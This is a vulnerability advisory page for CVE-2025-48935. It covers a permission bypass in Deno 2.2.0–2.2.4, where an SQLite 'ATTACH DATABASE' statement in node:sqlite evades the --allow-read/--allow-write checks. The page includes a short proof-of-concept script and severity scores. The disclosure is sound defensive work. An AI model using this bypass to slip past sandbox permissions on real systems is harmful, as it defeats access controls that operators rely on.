logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-48935 deno

Package

Manager: cargo
Name: deno
Vulnerable Version: >=2.2.0 <2.2.5

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

EPSS: 0.00061 pctl0.19148

Details

Deno has --allow-read / --allow-write permission bypass in `node:sqlite` ## Summary It is possible to bypass Deno's read/write permission checks by using `ATTACH DATABASE` statement. ## PoC ```js // poc.js import { DatabaseSync } from "node:sqlite" const db = new DatabaseSync(":memory:"); db.exec("ATTACH DATABASE 'test.db' as test;"); db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);"); ``` ``` $ deno poc.js ```

Metadata

Created: 2025-06-04T21:22:27Z
Modified: 2025-07-02T18:32:15Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-8vxj-4cph-c596/GHSA-8vxj-4cph-c596.json
CWE IDs: ["CWE-863"]
Alternative ID: GHSA-8vxj-4cph-c596
Finding: F006
Auto approve: 1